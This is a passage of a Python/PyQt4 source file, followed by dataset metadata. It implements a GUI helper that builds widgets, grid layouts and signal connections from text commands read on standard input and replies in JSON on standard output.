GRIDROW):\n gui_error(\"Grid layouts must be built from 'GRIDROW's ('*+*').\"\n \"\\nFound:\\n %s\" % repr(row))\n\n y += 1\n x = -1\n for wl in row.items:\n x += 1\n if isinstance(wl, Span):\n continue\n # Determine the row and column spans\n x1 = x + 1\n while (x1 < len(row.items)) and isinstance(row.items[x1], CSPAN):\n x1 += 1\n y1 = y + 1\n while (y1 < len(rows)) and isinstance(rows[y1].items[x], RSPAN):\n y1 += 1\n\n if isinstance(wl, QtGui.QWidget): #qt\n self.addWidget(wl, y, x, y1-y, x1-x) #qt\n elif isinstance(wl, Layout):\n self.addLayout(wl, y, x, y1-y, x1-x) #qt\n elif isinstance(wl, SPACE):\n self.addItem(QtGui.QSpacerItem(wl.size, wl.height),\n y, x, y1-y, x1-x) #qt\n else:\n gui_error(\"Invalid entry in Grid layout: %s\" % repr(wl))\n\n\nclass GRIDROW:\n \"\"\"It is necessary to have a layout class for a grid row because a list\n is always interpreted as being a layout item.\n \"\"\"\n def __init__(self, *items):\n self.items = items\n\n\nclass SPACE:\n \"\"\"Can be used in boxes and grids. In boxes only size is of interest,\n and it also means vertical size in the case of a vbox. In grids size\n is the width.\n \"\"\"\n def __init__(self, size_width=0, height=0): #qt\n self.size = size_width #qt\n self.height = height #qt\n\n\nclass Span:\n \"\"\"Class to group special grid layout objects together - it doesn't\n actually do anything itself, but is used for checking object types.\n \"\"\"\n pass\n\n\nclass CSPAN(Span):\n \"\"\"Column-span layout item. It doesn't do anything itself, but it is used\n by the Grid layout constructor.\n \"\"\"\n pass\n\n\nclass RSPAN(Span):\n \"\"\"Row-span layout item. 
It doesn't do anything itself, but it is used\n by the Grid layout constructor.\n \"\"\"\n pass\n\n\nclass HLINE(QtGui.QFrame): #qt\n def __init__(self):\n QtGui.QFrame.__init__(self) #qt\n self.setFrameShape(QtGui.QFrame.HLine) #qt\n\n\nclass VLINE(QtGui.QFrame): #qt\n def __init__(self):\n QtGui.QFrame.__init__(self) #qt\n self.setFrameShape(QtGui.QFrame.VLine) #qt\n\n\nclass Signal:\n \"\"\"Each instance represents a single connection.\n \"\"\"\n def __init__(self, source, signal, name=None):\n \"\"\"'source' is the widget object which initiates the signal.\n 'signal' is the signal type.\n If 'name' is given, the signal will get this as its name,\n and this name may be used for more than one connection.\n Otherwise the name is built from the name of the source widget and\n the signal type as 'source*signal' and may only be used once.\n If 'name' begins with '+' an additional argument, the source\n widget name, will be inserted at the head of the argument list.\n \"\"\"\n self.signame = signal\n self.tag = None\n sig = source.s_signals.get(signal)\n if not sig:\n gui_warning(\"Signal '%s' is not defined for '%s'.\"\n % (signal, source.w_name))\n return\n if name:\n l = guiapp.connections.get(name, [])\n if name.startswith(\"+\"):\n self.tag = source.w_name\n else:\n l = self\n name = \"%s*%s\" % (source.w_name, signal)\n if guiapp.connections.has_key(name):\n gui_warning(\"Signal '%s' is defined more than once.\" % name)\n return\n self.name = name\n try:\n self.convert = getattr(source, \"s_%s\" % signal)\n except:\n self.convert = None\n if QtCore.QObject.connect(source, QtCore.SIGNAL(sig), self.signal): #qt\n if l != self:\n l.append(self)\n guiapp.connections[name] = l\n else:\n gui_warning(\"Signal '%s' couldn't be connected.\" % name)\n\n def signal(self, *args):\n if self.convert:\n args = self.convert(*args)\n if self.tag:\n guiapp.sendsignal(self.name, self.tag, *args)\n else:\n guiapp.sendsignal(self.name, *args)\n\n# def disconnect(self):\n# ???\n\n\nclass GuiApp:\n \"\"\"This class represents an application gui, possibly with more than\n one top level window, these being defined in layout files.\n \"\"\"\n def __init__(self):\n global guiapp\n guiapp = self\n self.qtapp = QtGui.QApplication([]) #qt\n\n self.connections = {}\n self.widgets = {}\n\n\n def addwidget(self, fullname, wo):\n if self.widgets.has_key(fullname):\n gui_error(\"Attempted to define widget '%s' twice.\" % fullname)\n self.widgets[fullname] = wo\n\n\n def getwidget(self, w):\n widget = self.widgets.get(w)\n if not widget:\n gui_warning(\"Unknown widget: %s\" % w)\n return widget\n\n\n def show(self, windowname):\n self.getwidget(windowname).setVisible()\n\n\n def new_line(self, line):\n \"\"\"An input line has been received.\n The initial character determines the action:\n '!' - method calls to an exported widget, with no result.\n They have the form '!widget.method [arg1, arg2, ...]'\n where the argument list is json-encoded. If there are no\n arguments the square brackets needn't be present.\n '?' - similar to '!', but a return value is expected. It has\n a key value, which is everything up to the first ':' After\n that the arguments are as for '!'. The result is '@' followed\n by the key value, then ':', then the json-encoded call result.\n '%' - widget definition. The form is\n '%widget-type widget-name {attributes}', where the attribute\n dict is optional. 
If widget-name starts with '^' this will be\n stripped and the default signal for this widget will be enabled.\n '$' - set a layout on an existing widget. The form is\n '$ widget-name layout', where layout is in list form (see below).\n '^' - enable emission of the given signal. The form is\n '^widget-name signal-type signal-name' where signal-name is\n optional (see class Signal for details).\n \"\"\"\n line = str(line).rstrip()\n\n if line[0] == \"!\":\n # Process a method call - a command with no response\n try:\n self._methodcall(line[1:])\n except:\n onexcept(\"Bad gui command line:\\n \" + line)\n\n elif line[0] == \"?\":\n # Process a method call - an enquiry.\n try:\n l, r = line.split(\":\", 1)\n res = self._methodcall(r)\n except:\n onexcept(\"Bad gui enquiry line:\\n \" + line)\n self.send(\"@\", \"%s:%s\" % (l[1:], json.dumps(res)))\n\n elif line[0] == \"%\":\n # Add a widget\n try:\n args = line[1:].split(None, 2)\n if len(args) > 2:\n a = json.loads(args[2])\n assert isinstance(a, dict)\n else:\n a = {}\n self.newwidget(args[0], args[1], a)\n except:\n onexcept(\"Bad widget definition:\\n \" + line)\n # fatal\n\n elif line[0] == \"$\":\n # Set a widget's layout\n try:\n wn, l = line[1:].split(None, 1)\n self.layout(wn, json.loads(l))\n except:\n onexcept(\"Bad layout line:\\n \" + line)\n\n elif line[0] == \"^\":\n # Enable a signal\n args = line[1:].split()\n w = self.getwidget(args[0])\n if w:\n Signal(w, *args[1:])\n\n elif line[0] == \"/\":\n # Quit\n arg = line[1:].strip()\n self.send(\"/\", arg if arg else \"0\")\n guiapp.qtapp.quit()\n\n else:\n self.got(line)\n\n ithread.event.set()\n\n\n def _methodcall(self, text):\n wma = text.split(None, 1)\n cmd = specials_table.get(wma[0])\n if not cmd:\n w, m = wma[0].split(\".\")\n wo = self.getwidget(w)\n cmd = getattr(wo, m)\n if len(wma) > 1:\n return cmd(*json.loads(wma[1]))\n else:\n return cmd()\n\n\n def got(self, line):\n \"\"\"Reimplement this in a sub-class to do something else?\n \"\"\"\n gui_error(\"Unexpected input line:\\n \" + line)\n\n\n def send(self, mtype, line):\n \"\"\"Reimplement this in a sub-class to do something else?\n \"\"\"\n sys.stdout.write(\"%s%s\\n\" % (mtype, line))\n sys.stdout.flush()\n\n\n def sendsignal(self, name, *args):\n self.send(\"^\", name + \" \" + json.dumps(args))\n\n\n def newwidget(self, wtype, wname, args):\n if wname[0] == \"^\":\n wname = wname[1:]\n connect = True\n else:\n connect = False\n\n wobj = widget_table[wtype]()\n wobj.w_name = wname\n\n # Attributes\n for key, val in args.iteritems():\n handler = \"x__\" + key\n if hasattr(wobj, handler):\n getattr(wobj, handler)(val)\n# Unrecognized attributes are ignored ...\n\n # The widget may itself have created widgets that need including\n if hasattr(wobj, \"x_mywidgets\"):\n for n, w in wobj.x_mywidgets.iteritems():\n self.addwidget(n, w)\n if connect:\n Signal(wobj, wobj.s_default)\n self.addwidget(wname, wobj)\n\n\n def layout(self, wname, ltree):\n \"\"\"A layout call specifies and organizes the contents of a widget.\n The first argument is the name of the widget, the second argument\n is a layout manager list.\n\n There are three sorts of thing which can appear in layout manager\n lists (apart from the layout type at the head of the list and an\n optional attribute dict as second item). 
There can be named\n        widgets, there can be further layout managers (specified as lists,\n        nested as deeply as you like) and there can be layout widgets,\n        like spacers and separators.\n\n        A layout widget can appear in two forms - either as a simple\n        string (the layout widget type), or as a list with two entries,\n        the layout widget type and an attribute dict. In the former case\n        all attributes take on their default values.\n        \"\"\"\n        wobj = self.getwidget(wname)\n        assert isinstance(ltree, list)\n        lobj = self.getobj(ltree)\n        assert isinstance(lobj, Layout)\n        wobj.setLayout(lobj) #qt\n\n\n    def getobj(self, item):\n        if isinstance(item, list):\n            if (len(item) > 1) and isinstance(item[1], dict):\n                dictarg = item[1]\n                ilist = item[2:]\n            else:\n                dictarg = {}\n                ilist = item[1:]\n            if item[0].endswith(\"*\"):\n                args = [self.getobj(i) for i in ilist]\n            else:\n                args = ilist\n            return self.newlayout(item[0], dictarg, args)\n\n        elif item.startswith(\"*\"):\n            return self.newlayout(item, {}, [])\n\n        else:\n            return self.getwidget(item)\n\n\n    def newlayout(self, item, parms, args):\n        lfunc = layout_table.get(item)\n        if lfunc:\n            lobj = lfunc(*args)\n            # Attributes\n            # NOTE: fixed from the original 'for key, val in parms:', which\n            # iterated over the dict's keys only and failed to unpack them\n            for key, val in parms.items():\n                handler = \"x__\" + key\n                if hasattr(lobj, handler):\n                    getattr(lobj, handler)(val)\n            return lobj\n        else:\n            gui_error(\"Unknown layout type: %s\" % item)\n\n\n#+++++++++++++++++++++++++++\n# Catch all unhandled errors.\ndef errorTrap(type, value, tb):\n    etext = \"\".join(traceback.format_exception(type, value, tb))\n    gui_error(etext, \"This error could not be handled.\")\n\nsys.excepthook = errorTrap\n#---------------------------\n\nwidget_table = {\n    \"Window\": Window,\n    \"Dialog\": Dialog,\n    \"DialogButtons\": DialogButtons,\n    \"Notebook\": Notebook,\n    \"Stack\": Stack,\n    \"Frame\": Frame,\n    \"Button\": Button,\n    \"ToggleButton\": ToggleButton,\n    \"RadioButton\": RadioButton,\n    \"CheckBox\": CheckBox,\n    \"Label\": Label,\n    \"CheckList\": CheckList,\n    \"List\": List,\n    \"OptionalFrame\": OptionalFrame,\n    \"ComboBox\": ComboBox,\n    \"ListChoice\": ListChoice,\n    \"LineEdit\": LineEdit,\n    \"TextEdit\": TextEdit,\n    \"HtmlView\": HtmlView,\n    \"SpinBox\": SpinBox,\n    \"ProgressBar\": ProgressBar,\n}\n\nspecials_table = {\n    \"textLineDialog\": textLineDialog,\n    \"infoDialog\": infoDialog,\n    \"confirmDialog\": confirmDialog,\n    \"errorDialog\": gui_error,\n    \"warningDialog\": gui_warning,\n    \"fileDialog\": fileDialog,\n    \"specialFileDialog\": specialFileDialog,\n}\n\nlayout_table = {\n    \"*VBOX*\": VBOX,\n    \"*HBOX*\": HBOX,\n    \"*GRID*\": GRID,\n    \"*+*\": GRIDROW,\n    \"*-\": CSPAN,\n    \"*|\": RSPAN,\n    \"*SPACE\": SPACE,\n    \"*VLINE\": VLINE,\n    \"*HLINE\": HLINE,\n}\n\n\n\n#+++++++++++++++++++++++++++++++++++\n# The input handler, a separate thread.\n\n# Start input thread\nclass Input(QtCore.QThread): #qt\n    def __init__(self, input, target):\n        QtCore.QThread.__init__(self) #qt\n        # It seems the argument must be a Qt type:\n        self.lineReady = QtCore.SIGNAL(\"lineReady(QString)\") #qt\n        self.input = input\n        self.connect(self, self.lineReady, target) #qt\n        self.event = threading.Event()\n        self.event.set()\n\n    def run(self):\n        while True:\n            line = self.input.readline()\n            if not line: # Is this at all possible?\n                return\n            self.event.wait()\n            self.event.clear()\n            self.emit(self.lineReady, line) #qt\n#---------------------------\n\nif __name__ == \"__main__\":\n    GuiApp()\n\n    ithread = Input(sys.stdin, guiapp.new_line)\n    ithread.start()\n\n    guiapp.qtapp.exec_() #qt\n\n", "repo_name": "chakra-project/packages-platform", "sub_path": "uipi/quip.py", 
"file_name": "quip.py", "file_ext": "py", "file_size_in_byte": 39699, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stderr.write", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QFont", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 52, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 64, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 66, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 67, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 67, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 68, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QIcon", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 97, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 97, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 102, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 102, "usage_type": "name"}, {"api_name": "threading.Lock", "line_number": 105, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget.closeEvent", "line_number": 113, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 113, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 113, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 137, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 137, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 155, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 155, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog.__init__", "line_number": 157, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 157, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 157, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 160, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 160, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox", "line_number": 163, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 163, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox", "line_number": 173, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 173, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox.__init__", "line_number": 178, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox", "line_number": 178, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 178, "usage_type": "name"}, 
{"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 184, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 200, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 200, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 202, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 202, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QInputDialog.getText", "line_number": 203, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QInputDialog", "line_number": 203, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 203, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.question", "line_number": 211, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 211, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 211, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 212, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 213, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 213, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.information", "line_number": 219, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 219, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 219, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.critical", "line_number": 227, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 227, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 227, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.warning", "line_number": 233, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 233, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 236, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFileDialog", "line_number": 246, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 246, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 260, "usage_type": "call"}, {"api_name": "os.path", "line_number": 260, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QFileDialog", "line_number": 270, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 270, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFileDialog", "line_number": 271, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 271, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QUrl.fromLocalFile", "line_number": 272, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QUrl", "line_number": 272, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 272, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 284, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 284, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStackedWidget", "line_number": 294, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", 
"line_number": 294, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStackedWidget.__init__", "line_number": 296, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QStackedWidget", "line_number": 296, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 296, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTabWidget", "line_number": 310, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 310, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTabWidget.__init__", "line_number": 316, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTabWidget", "line_number": 316, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 316, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 335, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 335, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 337, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 337, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 337, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGroupBox", "line_number": 340, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 340, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QGroupBox.__init__", "line_number": 342, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QGroupBox", "line_number": 342, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 342, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 367, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 367, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel.__init__", "line_number": 369, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 369, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 369, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPixmap", "line_number": 375, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 375, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 379, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 379, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 381, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 381, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 385, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 385, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton.__init__", "line_number": 391, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 391, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 391, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 394, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 394, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton.__init__", "line_number": 400, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 400, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 400, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QCheckBox", "line_number": 407, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 407, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QCheckBox.__init__", "line_number": 415, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QCheckBox", "line_number": 415, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 
415, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 421, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 421, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 426, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 426, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QRadioButton", "line_number": 429, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 429, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton.__init__", "line_number": 435, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 435, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 435, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 444, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 444, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox.__init__", "line_number": 451, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 451, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 451, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 462, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 462, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget.__init__", "line_number": 468, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 468, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 468, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTreeWidget", "line_number": 479, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 479, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTreeWidget.__init__", "line_number": 487, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTreeWidget", "line_number": 487, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 487, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 489, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 489, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 495, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 495, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 497, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 497, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QAbstractItemView", "line_number": 500, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 500, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTreeWidgetItem", "line_number": 511, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 511, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 541, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 541, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit.__init__", "line_number": 548, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 548, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 548, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 557, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 557, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 558, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 558, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", 
"line_number": 559, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 559, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 562, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 562, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 564, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 564, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 564, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 565, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 565, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 568, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 568, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 569, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 569, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 576, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 576, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 581, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 581, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidgetItem", "line_number": 588, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 588, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 589, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 589, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 590, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 590, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 594, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 594, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.__init__", "line_number": 596, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 596, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 596, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.undo", "line_number": 609, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 609, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 609, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.redo", "line_number": 612, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 612, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 612, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.copy", "line_number": 615, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 615, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 615, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.cut", "line_number": 618, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 618, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 618, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QTextEdit.paste", "line_number": 621, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QTextEdit", "line_number": 621, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 621, "usage_type": "name"}, {"api_name": "PyQt4.QtWebKit.QWebView", "line_number": 624, "usage_type": "attribute"}, {"api_name": "PyQt4.QtWebKit", "line_number": 624, "usage_type": 